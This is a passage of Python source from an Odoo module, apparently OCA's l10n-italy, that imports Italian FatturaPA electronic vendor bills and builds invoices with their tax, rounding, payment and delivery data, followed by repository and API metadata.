partner_id):\n partner_model = self.env[\"res.partner\"]\n partner = partner_model.browse(partner_id)\n invoice_data = self._prepare_invoice_values(\n fatt,\n fatturapa_attachment,\n FatturaBody,\n partner,\n )\n\n # 2.1.1.5\n found_withholding_taxes = self.set_withholding_tax(FatturaBody, invoice_data)\n\n invoice = self.env[\"account.move\"].create(invoice_data)\n credit_account = self.get_credit_account()\n\n invoice_lines = []\n # 2.2.1\n invoice_lines.extend(\n self.set_invoice_line_ids(\n FatturaBody,\n credit_account.id,\n partner,\n found_withholding_taxes,\n invoice,\n )\n )\n\n # 2.1.1.7\n invoice_lines.extend(\n self.set_welfares_fund(\n FatturaBody, credit_account.id, invoice, found_withholding_taxes\n )\n )\n\n # 2.1.1.10\n invoice_lines.extend(self.set_efatt_rounding(FatturaBody, invoice))\n\n invoice.with_context(check_move_validity=False).update(\n {\"invoice_line_ids\": [(6, 0, invoice_lines)]}\n )\n\n invoice._onchange_invoice_line_wt_ids()\n\n rel_docs_dict = {\n # 2.1.2\n \"order\": FatturaBody.DatiGenerali.DatiOrdineAcquisto,\n # 2.1.3\n \"contract\": FatturaBody.DatiGenerali.DatiContratto,\n # 2.1.4\n \"agreement\": FatturaBody.DatiGenerali.DatiConvenzione,\n # 2.1.5\n \"reception\": FatturaBody.DatiGenerali.DatiRicezione,\n # 2.1.6\n \"invoice\": FatturaBody.DatiGenerali.DatiFattureCollegate,\n }\n\n for rel_doc_key, rel_doc_data in rel_docs_dict.items():\n if not rel_doc_data:\n continue\n for rel_doc in rel_doc_data:\n doc_datas = self._prepareRelDocsLine(invoice.id, rel_doc, rel_doc_key)\n for doc_data in doc_datas:\n # Note for v12: must take advantage of batch creation\n self.env[\"fatturapa.related_document_type\"].create(doc_data)\n\n # 2.1.7\n self.set_activity_progress(FatturaBody, invoice)\n\n # 2.1.8\n self.set_ddt_data(FatturaBody, invoice)\n\n # 2.1.9\n self.set_delivery_data(FatturaBody, invoice)\n\n # 2.2.2\n self.set_summary_data(FatturaBody, invoice)\n\n # 2.1.10\n self.set_parent_invoice_data(FatturaBody, invoice)\n\n # 2.3\n self.set_vehicles_data(FatturaBody, invoice)\n\n # 2.4\n self.set_payments_data(FatturaBody, invoice, partner_id)\n\n # 2.5\n self.set_attachments_data(FatturaBody, invoice)\n\n self._addGlobalDiscount(\n invoice.id, FatturaBody.DatiGenerali.DatiGeneraliDocumento\n )\n\n if self.e_invoice_detail_level != \"1\":\n self.set_roundings(FatturaBody, invoice)\n\n self.set_vendor_bill_data(FatturaBody, invoice)\n\n # this can happen with refunds with negative amounts\n invoice.process_negative_lines()\n return invoice\n\n def set_vendor_bill_data(self, FatturaBody, invoice):\n if not invoice.invoice_date:\n invoice.update(\n {\n \"invoice_date\": datetime.strptime(\n FatturaBody.DatiGenerali.DatiGeneraliDocumento.Data, \"%Y-%m-%d\"\n ).date(),\n }\n )\n if not invoice.ref:\n today = fields.Date.context_today(self)\n x = invoice.line_ids.filtered(\n lambda line: line.account_id.account_type\n in (\"asset_receivable\", \"liability_payable\")\n ).sorted(lambda line: line.date_maturity or today)\n if x:\n x[-1].name = FatturaBody.DatiGenerali.DatiGeneraliDocumento.Numero\n invoice.ref = FatturaBody.DatiGenerali.DatiGeneraliDocumento.Numero\n if not invoice.payment_reference:\n invoice.payment_reference = invoice.ref\n\n def set_parent_invoice_data(self, FatturaBody, invoice):\n ParentInvoice = FatturaBody.DatiGenerali.FatturaPrincipale\n if ParentInvoice:\n parentinv_vals = {\n \"related_invoice_code\": ParentInvoice.NumeroFatturaPrincipale or \"\",\n \"related_invoice_date\": ParentInvoice.DataFatturaPrincipale or False,\n }\n 
invoice.write(parentinv_vals)\n\n def set_vehicles_data(self, FatturaBody, invoice):\n Vehicle = FatturaBody.DatiVeicoli\n if Vehicle:\n veicle_vals = {\n \"vehicle_registration\": Vehicle.Data or False,\n \"total_travel\": Vehicle.TotalePercorso or \"\",\n }\n invoice.write(veicle_vals)\n\n def set_attachments_data(self, FatturaBody, invoice):\n invoice_id = invoice.id\n AttachmentsData = FatturaBody.Allegati\n if AttachmentsData:\n self.env[\"fatturapa.attachment.in\"].extract_attachments(\n AttachmentsData, invoice_id\n )\n\n def set_ddt_data(self, FatturaBody, invoice):\n invoice_id = invoice.id\n DdtDatas = FatturaBody.DatiGenerali.DatiDDT\n if not DdtDatas:\n return\n invoice_line_model = self.env[\"account.move.line\"]\n DdTModel = self.env[\"fatturapa.related_ddt\"]\n for DdtDataLine in DdtDatas:\n if not DdtDataLine.RiferimentoNumeroLinea:\n DdTModel.create(\n {\n \"name\": DdtDataLine.NumeroDDT or \"\",\n \"date\": DdtDataLine.DataDDT or False,\n \"invoice_id\": invoice_id,\n }\n )\n else:\n for numline in DdtDataLine.RiferimentoNumeroLinea:\n invoice_lines = invoice_line_model.search(\n [\n (\"move_id\", \"=\", invoice_id),\n (\"sequence\", \"=\", int(numline)),\n ]\n )\n invoice_lineid = False\n if invoice_lines:\n invoice_lineid = invoice_lines[0].id\n DdTModel.create(\n {\n \"name\": DdtDataLine.NumeroDDT or \"\",\n \"date\": DdtDataLine.DataDDT or False,\n \"invoice_id\": invoice_id,\n \"invoice_line_id\": invoice_lineid,\n }\n )\n\n def set_art73(self, FatturaBody, invoice_data):\n if FatturaBody.DatiGenerali.DatiGeneraliDocumento.Art73:\n invoice_data[\"art73\"] = True\n\n def set_roundings(self, FatturaBody, invoice):\n rounding = 0.0\n if FatturaBody.DatiBeniServizi.DatiRiepilogo:\n for summary in FatturaBody.DatiBeniServizi.DatiRiepilogo:\n rounding += float(summary.Arrotondamento or 0.0)\n if FatturaBody.DatiGenerali.DatiGeneraliDocumento:\n summary = FatturaBody.DatiGenerali.DatiGeneraliDocumento\n rounding += float(summary.Arrotondamento or 0.0)\n\n if rounding:\n arrotondamenti_attivi_account_id = (\n self.env.company.arrotondamenti_attivi_account_id\n )\n if not arrotondamenti_attivi_account_id:\n raise UserError(\n _(\"Round up account is not set \" \"in Accounting Settings\")\n )\n\n arrotondamenti_passivi_account_id = (\n self.env.company.arrotondamenti_passivi_account_id\n )\n if not arrotondamenti_passivi_account_id:\n raise UserError(\n _(\"Round down account is not set \" \"in Accounting Settings\")\n )\n\n arrotondamenti_tax_id = self.env.company.arrotondamenti_tax_id\n if not arrotondamenti_tax_id:\n self.log_inconsistency(_(\"Round up and down tax is not set\"))\n\n line_sequence = max(invoice.invoice_line_ids.mapped(\"sequence\"), default=1)\n line_vals = []\n for summary in FatturaBody.DatiBeniServizi.DatiRiepilogo:\n # XXX fallisce cattivo se non trova l'imposta Arrotondamento\n to_round = float(summary.Arrotondamento or 0.0)\n if to_round != 0.0:\n account_taxes = self.get_account_taxes(\n summary.AliquotaIVA, summary.Natura\n )\n arrotondamenti_account_id = (\n arrotondamenti_passivi_account_id.id\n if to_round > 0.0\n else arrotondamenti_attivi_account_id.id\n )\n invoice_line_tax_id = (\n account_taxes[0].id\n if account_taxes\n else arrotondamenti_tax_id.id\n )\n name = _(\"Rounding down\") if to_round > 0.0 else _(\"Rounding up\")\n line_sequence += 1\n upd_vals = {\n \"sequence\": line_sequence,\n \"move_id\": invoice.id,\n \"name\": name,\n \"account_id\": arrotondamenti_account_id,\n \"price_unit\": to_round,\n \"tax_ids\": [(6, 0, 
[invoice_line_tax_id])],\n }\n # Consider whether, for imports without rounding, it would be better\n # to work on debit and credit instead of\n # putting a tax on the value !!\n # if to_round<0:\n # upd_vals[\"debit\"]= abs(to_round)\n # else:\n # upd_vals[\"credit\"]= abs(to_round)\n line_vals.append(upd_vals)\n\n if line_vals:\n self.env[\"account.move.line\"].with_context(\n check_move_validity=False\n ).create(line_vals)\n\n def set_efatt_rounding(self, FatturaBody, invoice):\n invoice_line_model = self.env[\"account.move.line\"]\n invoice_line_ids = []\n if FatturaBody.DatiGenerali.DatiGeneraliDocumento.Arrotondamento:\n invoice.efatt_rounding = float(\n FatturaBody.DatiGenerali.DatiGeneraliDocumento.Arrotondamento\n )\n if invoice.efatt_rounding != 0:\n if invoice.efatt_rounding > 0:\n arrotondamenti_account_id = (\n self.env.company.arrotondamenti_passivi_account_id\n )\n if not arrotondamenti_account_id:\n raise UserError(\n _(\"Round down account is not set \" \"in Accounting Settings\")\n )\n name = _(\"Rounding down\")\n else:\n arrotondamenti_account_id = (\n self.env.company.arrotondamenti_attivi_account_id\n )\n if not arrotondamenti_account_id:\n raise UserError(\n _(\"Round up account is not set \" \"in Accounting Settings\")\n )\n name = _(\"Rounding up\")\n upd_vals = {\n \"move_id\": invoice.id,\n \"name\": name,\n \"account_id\": arrotondamenti_account_id.id,\n \"price_unit\": invoice.efatt_rounding,\n \"quantity\": 1,\n \"tax_ids\": [fields.Command.set([])],\n }\n self.create_and_get_line_id(\n invoice_line_ids, invoice_line_model, upd_vals\n )\n return invoice_line_ids\n\n def set_activity_progress(self, FatturaBody, invoice):\n invoice_id = invoice.id\n SalDatas = FatturaBody.DatiGenerali.DatiSAL\n if SalDatas:\n SalModel = self.env[\"fatturapa.activity.progress\"]\n for SalDataLine in SalDatas:\n SalModel.create(\n {\n \"fatturapa_activity_progress\": SalDataLine.RiferimentoFase or 0,\n \"invoice_id\": invoice_id,\n }\n )\n\n def _get_last_due_date(self, DatiPagamento):\n dates = []\n for PaymentLine in DatiPagamento or []:\n details = PaymentLine.DettaglioPagamento\n if details:\n for dline in details:\n if dline.DataScadenzaPagamento:\n dates.append(fields.Date.to_date(dline.DataScadenzaPagamento))\n dates.sort(reverse=True)\n return dates\n\n def set_payments_data(self, FatturaBody, invoice, partner_id):\n invoice_id = invoice.id\n PaymentsData = FatturaBody.DatiPagamento\n partner = self.env[\"res.partner\"].browse(partner_id)\n if not partner.property_supplier_payment_term_id:\n due_dates = self._get_last_due_date(FatturaBody.DatiPagamento)\n if due_dates:\n self.env[\"account.move\"].browse(\n invoice_id\n ).invoice_date_due = due_dates[0]\n if PaymentsData:\n PaymentDataModel = self.env[\"fatturapa.payment.data\"]\n PaymentTermsModel = self.env[\"fatturapa.payment_term\"]\n for PaymentLine in PaymentsData:\n cond = PaymentLine.CondizioniPagamento or False\n if not cond:\n raise UserError(_(\"Payment method code not found in document.\"))\n terms = PaymentTermsModel.search([(\"code\", \"=\", cond)])\n if not terms:\n raise UserError(_(\"Payment method code %s is incorrect.\") % cond)\n else:\n term_id = terms[0].id\n PayDataId = PaymentDataModel.create(\n {\"payment_terms\": term_id, \"invoice_id\": invoice_id}\n ).id\n self._createPaymentsLine(PayDataId, PaymentLine, partner_id, invoice)\n\n def set_withholding_tax(self, FatturaBody, invoice_data):\n Withholdings = FatturaBody.DatiGenerali.DatiGeneraliDocumento.DatiRitenuta\n if not Withholdings:\n return None\n\n withholding_tax_model = self.env[\"withholding.tax\"]\n found_withholding_taxes = withholding_tax_model.browse()\n e_withholding_taxes_values = []\n for Withholding in Withholdings:\n payment_reason_code = Withholding.CausalePagamento\n withholding_taxes = withholding_tax_model.search(\n [(\"payment_reason_id.code\", \"=\", payment_reason_code)],\n )\n if not withholding_taxes:\n raise UserError(\n _(\n \"The bill contains withholding tax with \"\n \"payment reason %s, \"\n \"but such a tax is not found in your system. Please \"\n \"set it.\",\n payment_reason_code,\n )\n )\n\n withholding_tax_amount = Withholding.AliquotaRitenuta\n e_withholding_tax_type = Withholding.TipoRitenuta\n withholding_tax_type = WT_CODES_MAPPING[e_withholding_tax_type]\n for withholding_tax in withholding_taxes:\n if (\n withholding_tax.tax == float(withholding_tax_amount)\n and withholding_tax_type == withholding_tax.wt_types\n ):\n found_withholding_taxes |= withholding_tax\n break\n else:\n raise UserError(\n _(\n \"No withholding tax found with document payment \"\n \"reason %(reason)s rate %(rate)s and type %(type)s.\",\n reason=payment_reason_code,\n rate=withholding_tax_amount,\n type=withholding_tax_type,\n )\n )\n\n e_withholding_tax_values = {\n \"name\": e_withholding_tax_type,\n \"amount\": Withholding.ImportoRitenuta,\n }\n e_withholding_taxes_values.append(e_withholding_tax_values)\n\n invoice_data[\"ftpa_withholding_ids\"] = [\n (0, 0, withholding_tax_values)\n for withholding_tax_values in e_withholding_taxes_values\n ]\n return found_withholding_taxes\n\n def set_welfares_fund(self, FatturaBody, credit_account_id, invoice, wt_founds):\n invoice_line_model = self.env[\"account.move.line\"]\n invoice_line_ids = []\n if self.e_invoice_detail_level == \"2\":\n\n Welfares = (\n FatturaBody.DatiGenerali.DatiGeneraliDocumento.DatiCassaPrevidenziale\n )\n if Welfares:\n WelfareFundLineModel = self.env[\"welfare.fund.data.line\"]\n for welfareLine in Welfares:\n welfare_line_vals = self._prepareWelfareLine(invoice.id, welfareLine)\n WelfareFundLineModel.create(welfare_line_vals)\n\n if welfareLine.TipoCassa == \"TC07\":\n continue\n\n line_vals = self._prepare_generic_line_data(welfareLine)\n line_vals.update(\n {\n \"name\": _(\"Welfare Fund: %s\") % welfareLine.TipoCassa,\n \"price_unit\": float(welfareLine.ImportoContributoCassa),\n \"move_id\": invoice.id,\n \"account_id\": credit_account_id,\n \"quantity\": 1,\n }\n )\n if welfareLine.Ritenuta:\n if not wt_founds:\n raise UserError(\n _(\n \"Welfare Fund data %s has withholding tax but no \"\n \"withholding tax was found in the system.\"\n )\n % welfareLine.TipoCassa\n )\n line_vals[\"invoice_line_tax_wt_ids\"] = [\n (6, 0, [wt.id for wt in wt_founds])\n ]\n if self.env.company.cassa_previdenziale_product_id:\n cassa_previdenziale_product = (\n self.env.company.cassa_previdenziale_product_id\n )\n line_vals[\"product_id\"] = cassa_previdenziale_product.id\n line_vals[\"name\"] = cassa_previdenziale_product.name\n self.adjust_accounting_data(\n cassa_previdenziale_product, line_vals\n )\n self.create_and_get_line_id(\n invoice_line_ids, invoice_line_model, line_vals\n )\n return invoice_line_ids\n\n def _convert_datetime(self, dtstring):\n ret = False\n try:\n dt = datetime.strptime(dtstring, \"%Y-%m-%dT%H:%M:%S\")\n if dt:\n ret = dt.strftime(\"%Y-%m-%d %H:%M:%S\")\n except (TypeError, ValueError): # pylint: disable=except-pass\n pass\n return ret\n\n def set_delivery_data(self, FatturaBody, invoice):\n Delivery = 
FatturaBody.DatiGenerali.DatiTrasporto\n if Delivery:\n delivery_id = self.getCarrirerPartner(Delivery)\n delivery_dict = {\n \"carrier_id\": delivery_id,\n \"transport_vehicle\": Delivery.MezzoTrasporto or \"\",\n \"transport_reason\": Delivery.CausaleTrasporto or \"\",\n \"number_items\": Delivery.NumeroColli or 0,\n \"description\": Delivery.Descrizione or \"\",\n \"unit_weight\": Delivery.UnitaMisuraPeso or 0.0,\n \"gross_weight\": Delivery.PesoLordo or 0.0,\n \"net_weight\": Delivery.PesoNetto or 0.0,\n \"pickup_datetime\": self._convert_datetime(Delivery.DataOraRitiro)\n or False,\n \"transport_date\": Delivery.DataInizioTrasporto or False,\n \"delivery_datetime\": self._convert_datetime(Delivery.DataOraConsegna)\n or False,\n \"delivery_address\": \"\",\n \"ftpa_incoterms\": Delivery.TipoResa,\n }\n\n if Delivery.IndirizzoResa:\n delivery_dict[\"delivery_address\"] = \"{}, {}\\n{} - {}\\n{} {}\".format(\n Delivery.IndirizzoResa.Indirizzo or \"\",\n Delivery.IndirizzoResa.NumeroCivico or \"\",\n Delivery.IndirizzoResa.CAP or \"\",\n Delivery.IndirizzoResa.Comune or \"\",\n Delivery.IndirizzoResa.Provincia or \"\",\n Delivery.IndirizzoResa.Nazione or \"\",\n )\n invoice.write(delivery_dict)\n\n def set_summary_data(self, FatturaBody, invoice):\n invoice_id = invoice.id\n Summary_datas = FatturaBody.DatiBeniServizi.DatiRiepilogo\n summary_data_model = self.env[\"fatturapa.summary.data\"]\n if Summary_datas:\n for summary in Summary_datas:\n summary_line = {\n \"tax_rate\": summary.AliquotaIVA or 0.0,\n \"non_taxable_nature\": summary.Natura or False,\n \"incidental_charges\": summary.SpeseAccessorie or 0.0,\n \"rounding\": summary.Arrotondamento or 0.0,\n \"amount_untaxed\": summary.ImponibileImporto or 0.0,\n \"amount_tax\": summary.Imposta or 0.0,\n \"payability\": summary.EsigibilitaIVA or False,\n \"law_reference\": summary.RiferimentoNormativo or \"\",\n \"invoice_id\": invoice_id,\n }\n summary_data_model.create(summary_line)\n\n def set_e_invoice_lines(self, FatturaBody, invoice_data):\n e_invoice_lines = self.env[\"einvoice.line\"].browse()\n for line in FatturaBody.DatiBeniServizi.DettaglioLinee:\n e_invoice_lines |= self.create_e_invoice_line(line)\n if e_invoice_lines:\n invoice_data[\"e_invoice_line_ids\"] = [(6, 0, e_invoice_lines.ids)]\n\n def _set_invoice_lines(\n self, product, invoice_line_data, invoice_lines, invoice_line_model\n ):\n\n if product:\n invoice_line_data[\"product_id\"] = product.id\n self.adjust_accounting_data(product, invoice_line_data)\n self.create_and_get_line_id(\n invoice_lines, invoice_line_model, invoice_line_data\n )\n\n # move_id\n # account_id\n def set_invoice_line_ids(\n self, FatturaBody, credit_account_id, partner, wt_founds, invoice\n ):\n invoice_lines = []\n invoice_line_model = self.env[\"account.move.line\"]\n if self.e_invoice_detail_level == \"1\":\n for nline, line in enumerate(FatturaBody.DatiBeniServizi.DatiRiepilogo):\n invoice_line_data = self._prepareInvoiceLineAliquota(\n credit_account_id, line, nline\n )\n invoice_line_data[\"move_id\"] = invoice.id\n\n product = partner.e_invoice_default_product_id\n self._set_invoice_lines(\n product, invoice_line_data, invoice_lines, invoice_line_model\n )\n\n elif self.e_invoice_detail_level == \"2\":\n for line in FatturaBody.DatiBeniServizi.DettaglioLinee:\n invoice_line_data = self._prepareInvoiceLine(\n credit_account_id, line, wt_founds\n )\n invoice_line_data[\"move_id\"] = invoice.id\n\n product = self.get_line_product(line, partner)\n self._set_invoice_lines(\n product, 
invoice_line_data, invoice_lines, invoice_line_model\n )\n return invoice_lines\n\n def check_invoice_amount(self, invoice, FatturaElettronicaBody):\n dgd = FatturaElettronicaBody.DatiGenerali.DatiGeneraliDocumento\n if dgd.ScontoMaggiorazione and dgd.ImportoTotaleDocumento:\n # assuming that, if someone uses\n # DatiGeneraliDocumento.ScontoMaggiorazione, also fills\n # DatiGeneraliDocumento.ImportoTotaleDocumento\n ImportoTotaleDocumento = float(dgd.ImportoTotaleDocumento)\n if not float_is_zero(\n invoice.amount_total - ImportoTotaleDocumento, precision_digits=2\n ):\n self.log_inconsistency(\n _(\n \"Bill total %(amount_total)s is different \"\n \"from document total amount %(document_total_amount)s\"\n )\n % {\n \"amount_total\": invoice.amount_total,\n \"document_total_amount\": ImportoTotaleDocumento,\n }\n )\n else:\n # else, we can only check DatiRiepilogo if\n # DatiGeneraliDocumento.ScontoMaggiorazione is not present,\n # because otherwise DatiRiepilogo and odoo invoice total would\n # differ\n amount_untaxed = invoice.compute_xml_amount_untaxed(FatturaElettronicaBody)\n if not float_is_zero(\n invoice.amount_untaxed - amount_untaxed, precision_digits=2\n ):\n self.log_inconsistency(\n _(\n \"Computed amount untaxed %(amount_untaxed)s is \"\n \"different from summary data %(summary_data)s\"\n )\n % {\n \"amount_untaxed\": invoice.amount_untaxed,\n \"summary_data\": amount_untaxed,\n }\n )\n\n def get_invoice_obj(self, fatturapa_attachment):\n xml_string = fatturapa_attachment.ir_attachment_id.get_xml_string()\n return efattura.CreateFromDocument(xml_string)\n\n def create_and_get_line_id(self, invoice_line_ids, invoice_line_model, upd_vals):\n invoice_line_id = (\n invoice_line_model.with_context(check_move_validity=False)\n .create(upd_vals)\n .id\n )\n invoice_line_ids.append(invoice_line_id)\n\n def _set_decimal_precision(self, precision_name, field_name):\n precision = self.env[\"decimal.precision\"].search(\n [(\"name\", \"=\", precision_name)], limit=1\n )\n different_precisions = original_precision = None\n if precision:\n precision_id = precision.id\n original_precision = precision.digits\n different_precisions = self[field_name] != original_precision\n if different_precisions:\n with registry(self.env.cr.dbname).cursor() as new_cr:\n # We need a new env (and cursor) because 'digits' property of Float\n # fields is retrieved with a new LazyCursor,\n # see class Float at odoo.fields,\n # so we need to write (commit) to DB in order to make the new\n # precision available\n new_env = api.Environment(new_cr, self.env.uid, self.env.context)\n new_precision = new_env[\"decimal.precision\"].browse(precision_id)\n new_precision.sudo().write({\"digits\": self[field_name]})\n new_cr.commit()\n return precision, different_precisions, original_precision\n\n def _restore_original_precision(self, precision, original_precision):\n with registry(self.env.cr.dbname).cursor() as new_cr:\n new_env = api.Environment(new_cr, self.env.uid, self.env.context)\n new_price_precision = new_env[\"decimal.precision\"].browse(precision.id)\n new_price_precision.sudo().write({\"digits\": original_precision})\n new_cr.commit()\n\n def _get_invoice_partner_id(self, fatt):\n cedentePrestatore = fatt.FatturaElettronicaHeader.CedentePrestatore\n partner_id = self.getCedPrest(cedentePrestatore)\n return partner_id\n\n def importFatturaPA(self):\n self.ensure_one()\n\n (\n price_precision,\n different_price_precisions,\n original_price_precision,\n ) = self._set_decimal_precision(\"Product Price\", 
\"price_decimal_digits\")\n (\n qty_precision,\n different_qty_precisions,\n original_qty_precision,\n ) = self._set_decimal_precision(\n \"Product Unit of Measure\", \"quantity_decimal_digits\"\n )\n (\n discount_precision,\n different_discount_precisions,\n original_discount_precision,\n ) = self._set_decimal_precision(\"Discount\", \"discount_decimal_digits\")\n\n new_invoices = []\n # convert to dict in order to be able to modify context\n fatturapa_attachments = self._get_selected_records()\n self.env.context = dict(self.env.context)\n for fatturapa_attachment in fatturapa_attachments:\n self.reset_inconsistencies()\n self._check_attachment(fatturapa_attachment)\n\n fatt = self.get_invoice_obj(fatturapa_attachment)\n cedentePrestatore = fatt.FatturaElettronicaHeader.CedentePrestatore\n # 1.2\n partner_id = self._get_invoice_partner_id(fatt)\n # 1.3\n TaxRappresentative = fatt.FatturaElettronicaHeader.RappresentanteFiscale\n # 1.5\n Intermediary = (\n fatt.FatturaElettronicaHeader.TerzoIntermediarioOSoggettoEmittente\n )\n\n generic_inconsistencies = \"\"\n existing_inconsistencies = self.get_inconsistencies()\n if existing_inconsistencies:\n generic_inconsistencies = existing_inconsistencies + \"\\n\\n\"\n\n xmlproblems = getattr(fatt, \"_xmldoctor\", None)\n if xmlproblems: # None or []\n generic_inconsistencies += \"\\n\".join(xmlproblems) + \"\\n\\n\"\n\n # 2\n for fattura in fatt.FatturaElettronicaBody:\n\n # reset inconsistencies\n self.reset_inconsistencies()\n\n invoice = self.invoiceCreate(\n fatt, fatturapa_attachment, fattura, partner_id\n )\n\n self.set_StabileOrganizzazione(cedentePrestatore, invoice)\n if TaxRappresentative:\n tax_partner_id = self.getPartnerBase(\n TaxRappresentative.DatiAnagrafici\n )\n invoice.write({\"tax_representative_id\": tax_partner_id})\n if Intermediary:\n Intermediary_id = self.getPartnerBase(Intermediary.DatiAnagrafici)\n invoice.write({\"intermediary\": Intermediary_id})\n new_invoices.append(invoice.id)\n self.check_invoice_amount(invoice, fattura)\n\n invoice.set_einvoice_data(fattura)\n\n existing_inconsistencies = self.get_inconsistencies()\n if existing_inconsistencies:\n invoice_inconsistencies = existing_inconsistencies\n else:\n invoice_inconsistencies = \"\"\n invoice.inconsistencies = (\n generic_inconsistencies + invoice_inconsistencies\n )\n\n if price_precision and different_price_precisions:\n self._restore_original_precision(price_precision, original_price_precision)\n if qty_precision and different_qty_precisions:\n self._restore_original_precision(qty_precision, original_qty_precision)\n if discount_precision and different_discount_precisions:\n self._restore_original_precision(\n discount_precision, original_discount_precision\n )\n\n return {\n \"view_type\": \"form\",\n \"name\": \"Electronic Bills\",\n \"view_mode\": \"tree,form\",\n \"res_model\": \"account.move\",\n \"type\": \"ir.actions.act_window\",\n \"domain\": [(\"id\", \"in\", new_invoices)],\n }\n", "repo_name": "OCA/l10n-italy", "sub_path": "l10n_it_fatturapa_in/wizard/wizard_import_fatturapa.py", "file_name": "wizard_import_fatturapa.py", "file_ext": "py", "file_size_in_byte": 81066, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 115, "dataset": "github-code", "pt": "31", "api": [{"api_name": "logging.getLogger", "line_number": 16, "usage_type": "call"}, {"api_name": "odoo.models.TransientModel", "line_number": 28, "usage_type": "attribute"}, {"api_name": "odoo.models", "line_number": 28, "usage_type": "name"}, {"api_name": 
"odoo.fields.Selection", "line_number": 32, "usage_type": "call"}, {"api_name": "odoo.fields", "line_number": 32, "usage_type": "name"}, {"api_name": "odoo.fields.Integer", "line_number": 48, "usage_type": "call"}, {"api_name": "odoo.fields", "line_number": 48, "usage_type": "name"}, {"api_name": "odoo.fields.Integer", "line_number": 56, "usage_type": "call"}, {"api_name": "odoo.fields", "line_number": 56, "usage_type": "name"}, {"api_name": "odoo.fields.Integer", "line_number": 61, "usage_type": "call"}, {"api_name": "odoo.fields", "line_number": 61, "usage_type": "name"}, {"api_name": "odoo.exceptions.UserError", "line_number": 81, "usage_type": "call"}, {"api_name": "odoo.tools.translate._", "line_number": 81, "usage_type": "call"}, {"api_name": "odoo.api.model", "line_number": 86, "usage_type": "attribute"}, {"api_name": "odoo.api", "line_number": 86, "usage_type": "name"}, {"api_name": "odoo.tools.frozendict", "line_number": 139, "usage_type": "call"}, {"api_name": "odoo.tools.frozendict", "line_number": 167, "usage_type": "call"}, {"api_name": "odoo.tools.translate._", "line_number": 176, "usage_type": "call"}, {"api_name": "odoo.tools.translate._", "line_number": 190, "usage_type": "call"}, {"api_name": "odoo.tools.translate._", "line_number": 204, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 222, "usage_type": "call"}, {"api_name": "odoo.tools.translate._", "line_number": 274, "usage_type": "call"}, {"api_name": "odoo.exceptions.UserError", "line_number": 297, "usage_type": "call"}, {"api_name": "odoo.tools.translate._", "line_number": 298, "usage_type": "call"}, {"api_name": "odoo.tools.translate._", "line_number": 350, "usage_type": "call"}, {"api_name": "odoo.tools.translate._", "line_number": 360, "usage_type": "call"}, {"api_name": "odoo.exceptions.UserError", "line_number": 372, "usage_type": "call"}, {"api_name": "odoo.tools.translate._", "line_number": 373, "usage_type": "call"}, {"api_name": "odoo.tools.translate._", "line_number": 386, "usage_type": "call"}, {"api_name": "odoo.tools.translate._", "line_number": 408, "usage_type": "call"}, {"api_name": "odoo.fields.Command.set", "line_number": 450, "usage_type": "call"}, {"api_name": "odoo.fields.Command", "line_number": 450, "usage_type": "attribute"}, {"api_name": "odoo.fields", "line_number": 450, "usage_type": "name"}, {"api_name": "odoo.fields.Command.clear", "line_number": 452, "usage_type": "call"}, {"api_name": "odoo.fields.Command", "line_number": 452, "usage_type": "attribute"}, {"api_name": "odoo.fields", "line_number": 452, "usage_type": "name"}, {"api_name": "odoo.fields.first", "line_number": 466, "usage_type": "call"}, {"api_name": "odoo.osv.expression.AND", "line_number": 480, "usage_type": "call"}, {"api_name": "odoo.osv.expression", "line_number": 480, "usage_type": "name"}, {"api_name": "odoo.fields.first", "line_number": 492, "usage_type": "call"}, {"api_name": "odoo.tools.translate._", "line_number": 495, "usage_type": "call"}, {"api_name": "odoo.tools.translate._", "line_number": 504, "usage_type": "call"}, {"api_name": "odoo.osv.expression.AND", "line_number": 518, "usage_type": "call"}, {"api_name": "odoo.osv.expression", "line_number": 518, "usage_type": "name"}, {"api_name": "odoo.fields.first", "line_number": 532, "usage_type": "call"}, {"api_name": "odoo.tools.translate._", "line_number": 535, "usage_type": "call"}, {"api_name": "odoo.tools.translate._", "line_number": 546, "usage_type": "call"}, {"api_name": "odoo.fields.first", "line_number": 599, "usage_type": "call"}, 
{"api_name": "odoo.fields.Command", "line_number": 619, "usage_type": "attribute"}, {"api_name": "odoo.fields", "line_number": 619, "usage_type": "name"}, {"api_name": "odoo.tools.translate._", "line_number": 625, "usage_type": "call"}, {"api_name": "odoo.fields.Command.set", "line_number": 651, "usage_type": "call"}, {"api_name": "odoo.fields.Command", "line_number": 651, "usage_type": "attribute"}, {"api_name": "odoo.fields", "line_number": 651, "usage_type": "name"}, {"api_name": "odoo.fields.Command.clear", "line_number": 653, "usage_type": "call"}, {"api_name": "odoo.fields.Command", "line_number": 653, "usage_type": "attribute"}, {"api_name": "odoo.fields", "line_number": 653, "usage_type": "name"}, {"api_name": "odoo.tools.translate._", "line_number": 766, "usage_type": "call"}, {"api_name": "odoo.exceptions.UserError", "line_number": 773, "usage_type": "call"}, {"api_name": "odoo.tools.translate._", "line_number": 773, "usage_type": "call"}, {"api_name": "odoo.exceptions.UserError", "line_number": 787, "usage_type": "call"}, {"api_name": "odoo.tools.translate._", "line_number": 788, "usage_type": "call"}, {"api_name": "odoo.tools.translate._", "line_number": 840, "usage_type": "call"}, {"api_name": "odoo.fields.Command.clear", "line_number": 850, "usage_type": "call"}, {"api_name": "odoo.fields.Command", "line_number": 850, "usage_type": "attribute"}, {"api_name": "odoo.fields", "line_number": 850, "usage_type": "name"}, {"api_name": "odoo.exceptions.UserError", "line_number": 868, "usage_type": "call"}, {"api_name": "odoo.tools.translate._", "line_number": 869, "usage_type": "call"}, {"api_name": "odoo.tools.translate._", "line_number": 905, "usage_type": "call"}, {"api_name": "odoo.addons.base_iban.models.res_partner_bank.pretty_iban", "line_number": 923, "usage_type": "call"}, {"api_name": "odoo.tools.translate._", "line_number": 930, "usage_type": "call"}, {"api_name": "odoo.tools.translate._", "line_number": 950, "usage_type": "call"}, {"api_name": "odoo.exceptions.UserError", "line_number": 1010, "usage_type": "call"}, {"api_name": "odoo.tools.translate._", "line_number": 1011, "usage_type": "call"}, {"api_name": "odoo.exceptions.UserError", "line_number": 1097, "usage_type": "call"}, {"api_name": "odoo.tools.translate._", "line_number": 1098, "usage_type": "call"}, {"api_name": "odoo.exceptions.UserError", "line_number": 1120, "usage_type": "call"}, {"api_name": "odoo.tools.translate._", "line_number": 1121, "usage_type": "call"}, {"api_name": "odoo.exceptions.UserError", "line_number": 1140, "usage_type": "call"}, {"api_name": "odoo.tools.translate._", "line_number": 1141, "usage_type": "call"}, {"api_name": 